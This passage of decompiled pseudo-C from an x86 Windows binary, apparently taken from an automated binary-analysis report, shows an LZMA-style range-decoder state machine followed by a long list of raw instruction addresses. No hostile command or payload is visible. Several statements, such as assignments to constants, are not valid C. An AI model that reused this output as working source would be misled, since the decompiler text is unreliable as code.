												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                0x00000000
                0x00406409
                0x00406409
                0x0040640d
                0x0040641a
                0x00406424
                0x00000000
                0x0040640f
                0x0040640f
                0x0040644a
                0x0040644d
                0x00406450
                0x00406453
                0x00406453
                0x00406456
                0x0040645d
                0x00406462
                0x00406343
                0x00406346
                0x004066b8
                0x004066b8
                0x004066b8
                0x004066bb
                0x004066bb
                0x004066bb
                0x004066c1
                0x004066c7
                0x004066cd
                0x004066e7
                0x004066ea
                0x004066f0
                0x004066fb
                0x004066fd
                0x004066cf
                0x004066cf
                0x004066de
                0x004066e2
                0x004066e2
                0x00406707
                0x00000000
                0x00000000
                0x00406709
                0x0040670d
                0x004068bc
                0x004068d2
                0x004068da
                0x004068e1
                0x004068e3
                0x004068ea
                0x004068ee
                0x004068ee
                0x00406719
                0x00406720
                0x00406728
                0x0040672b
                0x0040672e
                0x0040672e
                0x00406734
                0x00406734
                0x00405ed0
                0x00405ed0
                0x00405ed0
                0x00405ed9
                0x00000000
                0x00000000
                0x00405edf
                0x00000000
                0x00405eea
                0x00000000
                0x00000000
                0x00405ef3
                0x00405ef6
                0x00405ef9
                0x00405efd
                0x00000000
                0x00000000
                0x00405f03
                0x00405f06
                0x00405f08
                0x00405f09
                0x00405f0c
                0x00405f0e
                0x00405f0f
                0x00405f11
                0x00405f14
                0x00405f19
                0x00405f1e
                0x00405f27
                0x00405f3a
                0x00405f3d
                0x00405f49
                0x00405f71
                0x00405f73
                0x00405f81
                0x00405f81
                0x00405f85
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00405f75
                0x00405f75
                0x00405f78
                0x00405f79
                0x00405f79
                0x00000000
                0x00405f75
                0x00405f4f
                0x00405f54
                0x00405f54
                0x00405f5d
                0x00405f65
                0x00405f68
                0x00000000
                0x00405f6e
                0x00405f6e
                0x00000000
                0x00405f6e
                0x00000000
                0x00405f8b
                0x00405f8b
                0x00405f8f
                0x0040683b
                0x00000000
                0x0040683b
                0x00405f98
                0x00405fa8
                0x00405fab
                0x00405fae
                0x00405fae
                0x00405fae
                0x00405fb1
                0x00405fb5
                0x00000000
                0x00000000
                0x00405fb7
                0x00405fbd
                0x00405fe7
                0x00405fed
                0x00405ff4
                0x00000000
                0x00405ff4
                0x00405fc3
                0x00405fc6
                0x00405fcb
                0x00405fcb
                0x00405fd6
                0x00405fde
                0x00405fe1
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406026
                0x0040602c
                0x0040602f
                0x0040603c
                0x00406044
                0x004066b8
                0x004066b8
                0x00000000
                0x00000000
                0x00405ffb
                0x00405ffb
                0x00405fff
                0x0040684a
                0x00000000
                0x0040684a
                0x0040600b
                0x00406016
                0x00406016
                0x00406016
                0x00406019
                0x0040601c
                0x0040601f
                0x00406024
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004066bb
                0x004066bb
                0x004066c1
                0x004066c7
                0x004066cd
                0x004066e7
                0x004066ea
                0x004066f0
                0x004066fb
                0x004066fd
                0x004066cf
                0x004066cf
                0x004066de
                0x004066e2
                0x004066e2
                0x00406707
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040604c
                0x0040604e
                0x00406051
                0x004060c2
                0x004060c5
                0x004060c8
                0x004060cf
                0x004060d9
                0x004066b8
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x004066b8
                0x00406053
                0x00406057
                0x0040605a
                0x0040605c
                0x0040605f
                0x00406062
                0x00406064
                0x00406067
                0x00406069
                0x0040606e
                0x00406071
                0x00406074
                0x00406078
                0x0040607f
                0x00406082
                0x00406089
                0x0040608d
                0x00406095
                0x00406095
                0x00406095
                0x0040608f
                0x0040608f
                0x0040608f
                0x00406084
                0x00406084
                0x00406084
                0x00406099
                0x0040609c
                0x004060ba
                0x004060bc
                0x00000000
                0x0040609e
                0x0040609e
                0x004060a1
                0x004060a4
                0x004060a7
                0x004060a9
                0x004060a9
                0x004060a9
                0x004060ac
                0x004060af
                0x004060b1
                0x004060b2
                0x004060b5
                0x00000000
                0x004060b5
                0x00000000
                0x004062eb
                0x004062ef
                0x0040630d
                0x00406310
                0x00406317
                0x0040631a
                0x0040631d
                0x00406320
                0x00406323
                0x00406326
                0x00406328
                0x0040632f
                0x00406330
                0x00406332
                0x00406335
                0x00406338
                0x0040633b
                0x0040633b
                0x00406340
                0x00000000
                0x00406340
                0x004062f1
                0x004062f4
                0x004062f7
                0x00406301
                0x004066b8
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x00000000
                0x00406355
                0x00406359
                0x0040637c
                0x0040637f
                0x00406382
                0x0040638c
                0x0040635b
                0x0040635b
                0x0040635e
                0x00406361
                0x00406364
                0x00406371
                0x00406374
                0x00406374
                0x004066b8
                0x004066b8
                0x004066b8
                0x00000000
                0x004066b8
                0x00000000
                0x00406398
                0x0040639c
                0x00000000
                0x00000000
                0x004063a2
                0x004063a6
                0x00000000
                0x00000000
                0x004063ac
                0x004063ae
                0x004063b2
                0x004063b2
                0x004063b5
                0x004063b9
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406430
                0x00406434
                0x0040643b
                0x0040643e
                0x00406441
                0x00406436
                0x00406436
                0x00406436
                0x00406444
                0x00406447
                0x00000000
                0x00000000
                0x004064f0
                0x004064f0
                0x004064f4
                0x00406892
                0x00000000
                0x00406892
                0x004064fa
                0x004064fd
                0x00406500
                0x00406504
                0x00406507
                0x0040650d
                0x0040650f
                0x0040650f
                0x0040650f
                0x00406512
                0x00406515
                0x00000000
                0x00000000
                0x004060e5
                0x004060e5
                0x004060e9
                0x00406856
                0x00000000
                0x00406856
                0x004060ef
                0x004060f2
                0x004060f5
                0x004060f9
                0x004060fc
                0x00406102
                0x00406104
                0x00406104
                0x00406104
                0x00406107
                0x0040610a
                0x0040610a
                0x0040610d
                0x00406110
                0x00000000
                0x00000000
                0x00406116
                0x0040611c
                0x00000000
                0x00000000
                0x00406122
                0x00406122
                0x00406126
                0x00406129
                0x0040612c
                0x0040612f
                0x00406132
                0x00406133
                0x00406136
                0x00406138
                0x0040613e
                0x00406141
                0x00406144
                0x00406147
                0x0040614a
                0x0040614d
                0x00406150
                0x0040616c
                0x0040616f
                0x00406172
                0x00406175
                0x0040617c
                0x00406180
                0x00406182
                0x00406186
                0x00406152
                0x00406152
                0x00406156
                0x0040615e
                0x00406163
                0x00406165
                0x00406167
                0x00406167
                0x00406189
                0x00406190
                0x00406193
                0x00000000
                0x00406199
                0x00000000
                0x00406199
                0x00000000
                0x0040619e
                0x0040619e
                0x004061a2
                0x00406862
                0x00000000
                0x00406862
                0x004061a8
                0x004061ab
                0x004061ae
                0x004061b2
                0x004061b5
                0x004061bb
                0x004061bd
                0x004061bd
                0x004061bd
                0x004061c0
                0x004061c3
                0x004061c3
                0x004061c3
                0x004061c9
                0x00000000
                0x00000000
                0x004061cb
                0x004061ce
                0x004061d1
                0x004061d4
                0x004061d7
                0x004061da
                0x004061dd
                0x004061e0
                0x004061e3
                0x004061e6
                0x004061e9
                0x00406201
                0x00406204
                0x00406207
                0x0040620a
                0x0040620a
                0x0040620d
                0x00406211
                0x00406213
                0x004061eb
                0x004061eb
                0x004061f3
                0x004061f8
                0x004061fa
                0x004061fc
                0x004061fc
                0x00406216
                0x0040621d
                0x00406220
                0x00000000
                0x00406222
                0x00000000
                0x00406222
                0x00406220
                0x00406227
                0x00406227
                0x00406227
                0x00406227
                0x00000000
                0x00000000
                0x00406262
                0x00406262
                0x00406266
                0x0040686e
                0x00000000
                0x0040686e
                0x0040626c
                0x0040626f
                0x00406272
                0x00406276
                0x00406279
                0x0040627f
                0x00406281
                0x00406281
                0x00406281
                0x00406284
                0x00406287
                0x00406287
                0x0040628d
                0x0040622b
                0x0040622b
                0x0040622e
                0x00000000
                0x0040622e
                0x0040628f
                0x0040628f
                0x00406292
                0x00406295
